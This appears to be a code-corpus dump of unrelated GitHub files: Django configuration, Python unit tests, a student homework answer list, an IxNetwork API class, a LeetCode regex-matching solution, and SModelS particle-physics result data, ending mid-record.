3f78c466709124429eaedfcbc4849133d80eb1be | 4c4509c34b57350b605af50600eefc0c24a74255 | /ecommerce/urls.py | 0dead703ab3eb8c660305689032883b343a6f140 | [] | no_license | sayanth123/ecomm | cd6dd7e8c3fb13048d35c272379a320c20eb3d24 | 67101ebbb08c82bbd15a7c1dfc22c3da5483e307 | refs/heads/main | 2023-05-05T03:20:16.660301 | 2021-05-27T04:21:44 | 2021-05-27T04:21:44 | 370,259,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | """ecommerce URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from ecommerce import settings
from django.conf.urls.static import static
# Top-level URL routing: admin plus the three project apps.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('ecommerce_app/', include('ecommerceapp.urls')),
    path('search_app/', include('search_app.urls')),
    path('cart/', include('cart_app.urls')),
]
# Serve static and media files through Django itself in development only;
# in production these should be handled by the web server.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL,
                          document_root= settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
#search_app/
#ecommerce_app/ | [
"[email protected]"
] | |
9170b0b21899081c2505bb3e82a8d26b4391d673 | d650da884a0a33dd1acf17d04f56d6d22a2287fd | /test/test_inspect.py | 894d8f97bc3c3456e7baeaaca34461ea1c6b61a8 | [] | no_license | GaelicGrime/rpnpy | debe3a79e9a456e13dcd1421d42f01c0bcbe9084 | 5a095dd024403daad93a3222bd190bbb867a8ae2 | refs/heads/master | 2023-04-03T11:19:16.737278 | 2020-12-03T08:26:40 | 2020-12-03T08:26:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | from unittest import TestCase
from math import log
from rpnpy.inspect import countArgs
class TestCountArgs(TestCase):
    """Test the countArgs function"""

    def testZero(self):
        "A function that takes zero arguments must be processed correctly"
        self.assertEqual(0, countArgs(lambda: 3))

    def testOne(self):
        "A function that takes one argument must be processed correctly"
        self.assertEqual(1, countArgs(lambda x: 3))

    def testTwo(self):
        "A function that takes two arguments must be processed correctly"
        self.assertEqual(2, countArgs(lambda x, y: 3))

    def testLog(self):
        "The signature of math.log can't be inspected (at least in Python 3.7)"
        # countArgs returns None when inspect.signature raises for a builtin.
        self.assertEqual(None, countArgs(log))

    def testLogWithDefault(self):
        """The signature of math.log can't be inspected (at least in Python
        3.7). Pass a default value."""
        # The second argument is the fallback returned for uninspectable callables.
        self.assertEqual(3, countArgs(log, 3))
"[email protected]"
] | |
d09e8cfd12158d7338f73096900aa2f29faece0c | 09cead98874a64d55b9e5c84b369d3523c890442 | /py210110c_python1a/day06_210214/homework/hw_5_yiding.py | 2b8e12eb578a330374112c74a1059c59eddd995b | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | """
1,1
2,1
3,1
4,0
5,0
6,1
7,0.5
8,1
"""
"""
q1.
none, false, else if, for, in, from, as
q2.
abc$, 0a
q3.
a
q4.
c
q5.
a
q6.
a
q7.
a
q8.
a
""" | [
"[email protected]"
] | |
7a6ea156514e8fec2c46d6640f4d2fd9b8b57b5d | 80b7f2a10506f70477d8720e229d7530da2eff5d | /ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/statistics/misdirectedperflow/misdirectedperflow.py | 0562872acb73fb50d2a0e5450f633d42c7da8502 | [
"MIT"
] | permissive | OpenIxia/ixnetwork_restpy | 00fdc305901aa7e4b26e4000b133655e2d0e346a | c8ecc779421bffbc27c906c1ea51af3756d83398 | refs/heads/master | 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 | MIT | 2023-02-02T07:02:43 | 2019-03-06T15:27:20 | Python | UTF-8 | Python | false | false | 4,342 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class MisdirectedPerFlow(Base):
    """Display misdirected statistics on a per-flow basis. When active this replaces port level misdirected statistics
    The MisdirectedPerFlow class encapsulates a required misdirectedPerFlow resource which will be retrieved from the server every time the property is accessed.
    """

    __slots__ = ()
    _SDM_NAME = "misdirectedPerFlow"
    # Maps Python-facing attribute names to their REST/SDM field names.
    _SDM_ATT_MAP = {
        "Enabled": "enabled",
    }
    _SDM_ENUM_MAP = {}

    def __init__(self, parent, list_op=False):
        super(MisdirectedPerFlow, self).__init__(parent, list_op)

    @property
    def Enabled(self):
        # type: () -> bool
        """
        Returns
        -------
        - bool: If true then misdirected per flow statistics will be enabled
        """
        return self._get_attribute(self._SDM_ATT_MAP["Enabled"])

    @Enabled.setter
    def Enabled(self, value):
        # type: (bool) -> None
        self._set_attribute(self._SDM_ATT_MAP["Enabled"], value)

    def update(self, Enabled=None):
        # type: (bool) -> MisdirectedPerFlow
        """Updates misdirectedPerFlow resource on the server.

        Args
        ----
        - Enabled (bool): If true then misdirected per flow statistics will be enabled

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))

    def find(self, Enabled=None):
        # type: (bool) -> MisdirectedPerFlow
        """Finds and retrieves misdirectedPerFlow resources from the server.

        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve misdirectedPerFlow resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all misdirectedPerFlow resources from the server.

        Args
        ----
        - Enabled (bool): If true then misdirected per flow statistics will be enabled

        Returns
        -------
        - self: This instance with matching misdirectedPerFlow resources retrieved from the server available through an iterator or index

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))

    def read(self, href):
        """Retrieves a single instance of misdirectedPerFlow data from the server.

        Args
        ----
        - href (str): An href to the instance to be retrieved

        Returns
        -------
        - self: This instance with the misdirectedPerFlow resources from the server available through an iterator or index

        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
"[email protected]"
] | |
33f2f552754a26206f2b192b5ce5639d80bcdbf5 | 5efc0271eb922da63a6825112b4de786915b1b89 | /22_qpdf简化使用/test.py | def4e13a983537dc89696317c9b91c7f06cd114e | [] | no_license | uestcmee/PiecemealScripts | 41e7d45cbcd5d720822da6cbc935efd2ce0fcee4 | a18b4dd58229897aafe53767448e3fd8fb9c1881 | refs/heads/master | 2021-04-21T16:04:04.006230 | 2021-01-07T06:47:45 | 2021-01-07T06:47:45 | 249,794,695 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | import re
# A space-separated list of file paths; the first is wrapped in braces.
# The backslash before the CJK character is now escaped explicitly ('\\'),
# preserving the original string value without an invalid-escape warning.
files = '{D:/Desktop/Geryler Karadi 2015.pdf} D:/Desktop/光伏产业\\链.png'
# BUG FIX: str.replace returns a NEW string (str is immutable); the original
# call discarded the result, leaving `files` unchanged. Rebind to apply it.
files = files.replace('\\', '/')
print(files)
"[email protected]"
] | |
006123581571814076c0c5a650ae638e95c97553 | 6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8 | /algorithms/algorithms-python/leetcode/Question_010_Regular_Expression_Matching.py | 68ae34c4b6feaa6b7adadbf0450d28621463d895 | [] | no_license | Lanceolata/code | aae54af632a212c878ce45b11dab919bba55bcb3 | f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb | refs/heads/master | 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | #!/usr/bin/python
# coding: utf-8
class Solution(object):
    def isMatch(self, s, p):
        """Regular-expression match supporting '.' (any one char) and
        '*' (zero or more of the preceding element).

        Bottom-up DP over prefixes: table[i][j] is True iff s[:i] fully
        matches p[:j]. Assumes a well-formed pattern ('*' never leads).

        :type s: str
        :type p: str
        :rtype: bool
        """
        if not p:
            return not s
        m, n = len(s), len(p)
        table = [[False] * (n + 1) for _ in range(m + 1)]
        table[0][0] = True
        # Empty string matches patterns like a*, a*b*, ... with every
        # starred element used zero times.
        for j in range(2, n + 1):
            if p[j - 1] == '*':
                table[0][j] = table[0][j - 2]
        for i in range(1, m + 1):
            for j in range(1, n + 1):
                if p[j - 1] == '*':
                    # Either drop the "x*" pair entirely, or consume one
                    # more character of s that matches the starred element.
                    drop_pair = table[i][j - 2]
                    consume = table[i - 1][j] and (s[i - 1] == p[j - 2] or p[j - 2] == '.')
                    table[i][j] = drop_pair or consume
                else:
                    same_char = s[i - 1] == p[j - 1] or p[j - 1] == '.'
                    table[i][j] = same_char and table[i - 1][j - 1]
        return table[m][n]
| [
"[email protected]"
] | |
72c49aa9bbe684e1346f0668477ce89c841a9b0a | 74192ed5b9b5529c7b6ab9f238e9f44d5dce6aca | /backend/manage.py | abefc5fc0c9913675279a1ecc7a3677e5d3465ed | [] | no_license | crowdbotics-apps/black-mart-23466 | 47691415229f97248b7aaf18c6efca45f81d6e84 | 5be279d61e74cc543782b8879ca4d7abeb3ad06c | refs/heads/master | 2023-02-03T22:51:54.843742 | 2020-12-24T19:41:41 | 2020-12-24T19:41:41 | 322,783,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django's command-line entry point for administrative tasks."""
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "black_mart_23466.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
main()
| [
"[email protected]"
] | |
342d7838454b684e37cb8847a8e2eb7083a265e8 | bae75bf1de75fb1b76e19b0d32c778e566de570a | /smodels/test/testFiles/scanExample/smodels-output/100488230.slha.py | 61b10a9b406b2f585c269025d1c544acdcb3f737 | [] | no_license | andlessa/RDM | 78ae5cbadda1875c24e1bb726096b05c61627249 | ac6b242871894fee492e089d378806c2c2e7aad8 | refs/heads/master | 2023-08-16T00:47:14.415434 | 2021-09-21T20:54:25 | 2021-09-21T20:54:25 | 228,639,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,108 | py | smodelsOutput = {'ExptRes': [{'AnalysisSqrts (TeV)': 8, 'chi2': -0.01262596850888705, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.242, 'likelihood': 0.24134326901519393, 'AnalysisID': 'ATLAS-CONF-2013-093', 'upper limit (fb)': 0.21, 'theory prediction (fb)': 1.9895558829990775e-05, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'SRBh'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.080725933861111418, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.517, 'likelihood': 0.080915004649873834, 'AnalysisID': 'ATLAS-CONF-2013-053', 'upper limit (fb)': 0.45, 'theory prediction (fb)': 4.641807353583199e-05, 'lumi (fb-1)': 20.1, 'TxNames': ['T2tt'], 'DataSetID': 'SRA mCT250'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 1.3268179470754997, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.235, 'likelihood': 0.082051203901957165, 'AnalysisID': 'ATLAS-CONF-2013-062', 'upper limit (fb)': 0.38, 'theory prediction (fb)': 0.00014170357283113728, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'incHL3j_m'}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 0.18071342418780731, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.23, 'likelihood': 0.030109490456771158, 'AnalysisID': 'ATLAS-SUSY-2013-04', 'upper limit (fb)': 1.04, 
'theory prediction (fb)': 0.00015365831214172594, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'GtGrid_SR_8ej50_2ibjet'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.11881841528273665, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.292, 'likelihood': 0.19205573525299049, 'AnalysisID': 'ATLAS-CONF-2013-061', 'upper limit (fb)': 0.23, 'theory prediction (fb)': 0.00016085993231827376, 'lumi (fb-1)': 20.1, 'TxNames': ['T2tt'], 'DataSetID': 'SR-0l-4j-A'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.15264247723847224, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.303, 'likelihood': 0.16330613782184344, 'AnalysisID': 'ATLAS-CONF-2013-048', 'upper limit (fb)': 0.23, 'theory prediction (fb)': 0.00016367804967709967, 'lumi (fb-1)': 20.3, 'TxNames': ['T2tt'], 'DataSetID': 'SR M120'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.51517066264090305, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.35, 'likelihood': 0.090423569611299118, 'AnalysisID': 'ATLAS-CONF-2013-037', 'upper limit (fb)': 0.4, 'theory prediction (fb)': 0.0006599393876471776, 'lumi (fb-1)': 20.7, 'TxNames': ['T2tt'], 'DataSetID': 'SRtN3'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.7460827902608741, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.239, 'likelihood': 0.18762627815864522, 'AnalysisID': 'ATLAS-CONF-2013-024', 'upper limit (fb)': 0.19, 'theory prediction (fb)': 0.0007758367207617888, 'lumi (fb-1)': 20.5, 'TxNames': ['T2tt'], 'DataSetID': 'SR3: MET > 350'}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.09139882929374292, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.463, 'likelihood': 0.091787344807384222, 'AnalysisID': 'ATLAS-CONF-2013-054', 'upper limit (fb)': 0.5, 'theory prediction (fb)': 
0.0013047848687137208, 'lumi (fb-1)': 20.3, 'TxNames': ['T2', 'T2tt'], 'DataSetID': '7j80 flavor 0 b-jets'}, {'AnalysisSqrts (TeV)': 13, 'chi2': 0.035181360747816408, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.26, 'likelihood': 0.34814937255663714, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 1.26, 'theory prediction (fb)': 0.012020001372145027, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': 'SR2'}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-PAS-SUS-13-023', 'upper limit (fb)': 4.488370799999999, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 18.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-004', 'upper limit (fb)': 6.707422400000001, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 19.3, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-019', 'upper limit (fb)': 28.95454, 'theory prediction (fb)': 0.034444562449142735, 'lumi (fb-1)': 19.5, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'chi2': 2.0775669740848599, 'dataType': 'efficiencyMap', 'Mass (GeV)': [[435.0, 321.4], [435.0, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': 0.8395, 'likelihood': 0.018118314232756384, 'AnalysisID': 'ATLAS-SUSY-2014-03', 'upper limit (fb)': 0.5018, 'theory prediction (fb)': 0.0425236728155903, 'lumi (fb-1)': 20.3, 'TxNames': ['TScharm'], 'DataSetID': 'mCT150'}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 340.04999999999995], [808.3, 340.04999999999995]], 
'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 103.54699999999993, 'theory prediction (fb)': 0.2796967836994387, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2015-02', 'upper limit (fb)': 77.06399999999996, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 3.2, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 16.03673333333333, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 9.556988800000001, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-049', 'upper limit (fb)': 13.280713076923078, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-050', 'upper limit (fb)': 14.412808000000002, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 
321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-051', 'upper limit (fb)': 10.6244916, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[808.3, 321.4], [808.3, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-17-001', 'upper limit (fb)': 35.44316, 'theory prediction (fb)': 0.3496303949578995, 'lumi (fb-1)': 35.9, 'TxNames': ['T2tt'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 0.0046844499378386195, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 0.743, 'likelihood': 0.050115430028928237, 'AnalysisID': 'CMS-SUS-13-012', 'upper limit (fb)': 1.21, 'theory prediction (fb)': 0.5057031943004956, 'lumi (fb-1)': 19.5, 'TxNames': ['T2', 'T2tt', 'T6bbWWoff'], 'DataSetID': '3NJet6_1000HT1250_600MHTinf'}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 4.1627674417777785, 'theory prediction (fb)': 0.5683519371938481, 'lumi (fb-1)': 20.3, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'chi2': 0.047123556716875459, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 2.1, 'likelihood': 0.018033175934649193, 'AnalysisID': 'ATLAS-CONF-2013-047', 'upper limit (fb)': 2.52, 'theory prediction (fb)': 0.8775048582679014, 'lumi (fb-1)': 20.3, 'TxNames': ['T1', 'T1bbqq', 'T2', 'T2tt'], 'DataSetID': 'A Medium'}, {'AnalysisSqrts (TeV)': 8.0, 'chi2': 2.3816461538326896, 'dataType': 'efficiencyMap', 'Mass (GeV)': None, 'maxcond': 0.0, 'expected upper limit (fb)': 1.5124, 'likelihood': 0.0078918609084519288, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 1.8181, 'theory prediction (fb)': 1.6613836669444895, 
'lumi (fb-1)': 20.3, 'TxNames': ['T1', 'T2'], 'DataSetID': 'SR2jt'}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 6.181469576852964, 'theory prediction (fb)': 4.941443621858816, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[1233.6, 321.4], [1233.6, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 4.1513288, 'theory prediction (fb)': 4.941443621858816, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[356.00988231550116, 321.4], [357.072205314013, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 5701.500237088296, 'theory prediction (fb)': 7.728246211660869, 'lumi (fb-1)': 20.3, 'TxNames': ['T1'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.1951789713725, 321.4], [438.3774682703211, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'ATLAS-SUSY-2013-02', 'upper limit (fb)': 967.6734743323401, 'theory prediction (fb)': 871.0003509943216, 'lumi (fb-1)': 20.3, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8.0, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.12625289533446, 321.4], [438.642216742945, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-13-012', 'upper limit (fb)': 1466.966818632756, 'theory prediction (fb)': 935.8148705756644, 'lumi (fb-1)': 19.5, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 8, 'dataType': 'upperLimit', 'Mass (GeV)': [[437.5209910776753, 321.4], [439.33102549677807, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 
'CMS-SUS-13-019', 'upper limit (fb)': 1061.9665100007187, 'theory prediction (fb)': 1160.4935751426733, 'lumi (fb-1)': 19.5, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.3496031120908, 321.4], [438.757496342467, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-033', 'upper limit (fb)': 399.35386729516733, 'theory prediction (fb)': 4591.861877556004, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}, {'AnalysisSqrts (TeV)': 13, 'dataType': 'upperLimit', 'Mass (GeV)': [[438.3496031120908, 321.4], [438.757496342467, 321.4]], 'maxcond': 0.0, 'expected upper limit (fb)': None, 'AnalysisID': 'CMS-SUS-16-036', 'upper limit (fb)': 514.2516169165423, 'theory prediction (fb)': 4591.861877556004, 'lumi (fb-1)': 35.9, 'TxNames': ['T2'], 'DataSetID': None}], 'OutputStatus': {'minmassgap': 5.0, 'input file': '../data/Bino_excluded_slha/100488230.slha', 'decomposition status': 1, 'warnings': 'Input file ok', 'ncpus': -1, 'maxcond': 0.2, 'smodels version': '1.1.1.post3', 'database version': '1.1.2', 'sigmacut': 0.03, 'file status': 1}, 'Long Cascades': [{'weight (fb)': 636.8858663515357, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {'weight (fb)': 546.6288974698384, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000002], [1000002, 1000004]]}, {'weight (fb)': 394.6239937857626, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000004], [1000004, 1000004]]}, {'weight (fb)': 391.487766702734, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000001], [1000001, 1000003], [1000003, 1000003]]}, {'weight (fb)': 299.66172224145225, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000002], [1000002, 1000003]]}, {'weight (fb)': 131.62539640945383, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000001], [1000002, 2000003]]}, {'weight (fb)': 73.16356174908559, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 2000001], [1000001, 
2000003], [1000003, 2000001], [1000003, 2000003]]}, {'weight (fb)': 30.624523126002337, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000002], [2000002, 2000003]]}, {'weight (fb)': 13.94121696982233, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000004], [1000003, 1000004]]}, {'weight (fb)': 13.793056107933312, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000002]]}], 'Missed Topologies': [{'weight (fb)': 1040.8566993139923, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[jet,jet]]]'}, {'weight (fb)': 540.876223519754, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet]]]'}, {'weight (fb)': 298.78807678620154, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[l,nu]]]'}, {'weight (fb)': 298.2006301817304, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu],[jet,jet]]]'}, {'weight (fb)': 147.30767131214859, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[jet,jet],[nu,ta]]]'}, {'weight (fb)': 145.60259457504057, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[nu,ta],[jet,jet]]]'}, {'weight (fb)': 139.21146559705483, 